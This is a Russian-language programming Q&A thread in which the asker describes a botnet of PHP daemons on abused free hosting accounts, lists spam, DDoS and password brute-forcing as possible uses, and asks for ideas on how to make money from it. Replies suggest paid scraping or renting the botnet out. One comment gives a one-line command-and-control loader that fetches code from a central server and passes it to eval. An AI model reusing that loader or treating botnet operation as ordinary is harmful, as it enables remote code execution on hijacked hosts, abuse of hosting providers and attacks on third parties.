# Советы/идеи по развитию проекта

Tags: веб-программирование, php

Вопрос скорее теоретический - думаю, стоит ли такую штуку развивать или дальше утилитки ей пути нет.

Итак, допустим: имеется некое подобие ботнета на фри-хостинге. Не суть, но характеристики таковы - можно запускать в несколько потоков скрипты (таймаут отсутствует), разрешены исходящие соединения (входящие ставить нельзя).

Собственно вопрос: что можно сделать с таким террариумом? Понятно - спам, ддос, брутфорс паролей, **НО** хочется же что-то полезное делать, ну и не нахаляву) Поделитесь мыслями?

ЗЫ: Если у кого есть гениальная идея и кто хочет заняться организацией (всем, кроме кодинга) - тоже можно.

ЗЗЫ: язык - пхп, демоны на доменах)

**UPD** Это все же террариум, а не "виртуальный датацентр" - хостинги убиваются и регаются заново, потому для хранения данных не подходят. Но данные можно куда-то сливать например)

Comment: Сделайте поисковый движок как у гугла.

Comment: Ну не поисковый движок, но да, где-то в этом направлении. Можно анализировать сайты, сканировать я.маркет и тп)

Answer (score 2, accepted):

Хм, при должной организации и централизованном хранилище, БД (хотя что уж там, можно и децентрализованном) можно заниматься парсингом контента сайтов за деньги, если разработать софт на котором за пару минут можно набросать схему парсинга, а также транслятор спарсеных данных в требуемую заказчиком структуру, то можно вполне на фрилансе data mining'ом заниматься (причем как на русских фриланс биржах так и англоязычных). Но в этом варианте главное разработать софт позволяющий быстро набросать схему парсинга и трансляции.

Другой вариант, можно стать хостером :), сдавать их в аренду, а можно и вовсе регистратором доменов). Но для всего этого все же требуются вложения денег :) Хотя с непостоянным набором хостов вероятно это не очень подойдет.

Comment: Ну если есть центр, то можно просто делать **`eval(file_get_contents('http://center/bot_action.txt'));`** (или function_create с контентом) а софт сведется к редактированию файла)

Comment: К слову ботнет в аренду... меня останавливает то, что люди таким ресурсом не будут пользоваться для вычисления расстояний между звездами и т.п. Хотя мб в голодный год покатит)

Comment: Хм, file_get_contents весьма не надежная функция иной раз даже на файлах возвращает false причем ни с того ни с сего, поэтому я в своих проектах зарекся ее использовать только в цикле c указанием максимального кол-ва попыток, и если все попытки провалились (вернулось false), то только в этом случае возвращаю false :) Ну это так, оффтоп :)

Comment: Хммм я все через свою обертку для fsockopen делаю) Просто этот код тут бы в камент не влез. А насчет цикла спс)